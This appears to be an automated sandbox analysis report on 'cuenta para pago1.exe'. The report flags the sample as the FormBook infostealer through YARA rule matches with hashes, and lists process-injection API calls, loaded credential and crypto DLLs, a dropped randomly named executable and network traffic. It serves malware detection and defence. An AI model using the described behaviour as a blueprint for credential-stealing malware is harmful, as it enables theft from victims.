        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
        Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.11.30:49803 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.30:49804 version: TLS 1.2
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052B8

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349034E0 NtCreateMutant,LdrInitializeThunk,2_2_349034E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_34902D10
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_34902B90
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34904570 NtSuspendThread,2_2_34904570
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34904260 NtSetContextThread,2_2_34904260
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34903C90 NtOpenThread,2_2_34903C90
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902CD0 NtEnumerateKey,2_2_34902CD0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902CF0 NtDelayExecution,2_2_34902CF0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902C10 NtOpenProcess,2_2_34902C10
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34903C30 NtOpenProcessToken,2_2_34903C30
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902C30 NtMapViewOfSection,2_2_34902C30
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902C20 NtSetInformationFile,2_2_34902C20
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902C50 NtUnmapViewOfSection,2_2_34902C50
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902DA0 NtReadVirtualMemory,2_2_34902DA0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902DC0 NtAdjustPrivilegesToken,2_2_34902DC0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902D50 NtWriteVirtualMemory,2_2_34902D50
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902E80 NtCreateProcessEx,2_2_34902E80
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902EB0 NtProtectVirtualMemory,2_2_34902EB0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902ED0 NtResumeThread,2_2_34902ED0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902EC0 NtQuerySection,2_2_34902EC0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902E00 NtQueueApcThread,2_2_34902E00
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902E50 NtCreateSection,2_2_34902E50
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902FB0 NtSetValueKey,2_2_34902FB0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902F00 NtCreateFile,2_2_34902F00
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902F30 NtOpenDirectoryObject,2_2_34902F30
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_004066E20_2_004066E2
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_00404AF50_2_00404AF5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D04452_2_348D0445
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498F5C92_2_3498F5C9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349875C62_2_349875C6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499A5262_2_3499A526
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D06802_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498A6C02_2_3498A6C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CC6E02_2_348CC6E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498F6F62_2_3498F6F6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EC6002_2_348EC600
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496D62C2_2_3496D62C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497D6462_2_3497D646
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F46702_2_348F4670
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349867572_2_34986757
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D27602_2_348D2760
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DA7602_2_348DA760
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C00A02_2_348C00A0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DB0D02_2_348DB0D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349870F12_2_349870F1
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497E0762_2_3497E076
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D51C02_2_348D51C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E02_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499010E2_2_3499010E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF1132_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496D1302_2_3496D130
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BD2EC2_2_348BD2EC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C13802_2_348C1380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DE3102_2_348DE310
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498F3302_2_3498F330
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34969C982_2_34969C98
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E8CDF2_2_348E8CDF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EFCE02_2_348EFCE0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499ACEB2_2_3499ACEB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C0C122_2_348C0C12
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DAC202_2_348DAC20
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497EC4C2_2_3497EC4C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D3C602_2_348D3C60
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34986C692_2_34986C69
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498EC602_2_3498EC60
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2DB02_2_348E2DB0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D9DD02_2_348D9DD0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496FDF42_2_3496FDF4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CAD002_2_348CAD00
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498FD272_2_3498FD27
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34987D4C2_2_34987D4C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0D692_2_348D0D69
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34980EAD2_2_34980EAD
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D1EB22_2_348D1EB2
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34989ED22_2_34989ED2
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C2EE82_2_348C2EE8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34970E6D2_2_34970E6D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498EFBF2_2_3498EFBF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34981FC62_2_34981FC6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D6FE02_2_348D6FE0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DCF002_2_348DCF00
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498FF632_2_3498FF63
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E68822_2_348E6882
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: String function: 348BB910 appears 149 times
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: String function: 34917BE4 appears 61 times
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: String function: 3494EF10 appears 79 times
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: String function: 3493E692 appears 62 times
        Source: cuenta para pago1.exeStatic PE information: invalid certificate
        Source: cuenta para pago1.exe, 00000002.00000003.4099312779.0000000034810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cuenta para pago1.exe
        Source: cuenta para pago1.exe, 00000002.00000003.4095218580.000000003465F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cuenta para pago1.exe
        Source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerasdlui.exej% vs cuenta para pago1.exe
        Source: cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034B60000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cuenta para pago1.exe
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasdlg.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: mprapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: cuenta para pago1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/10@30/15
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
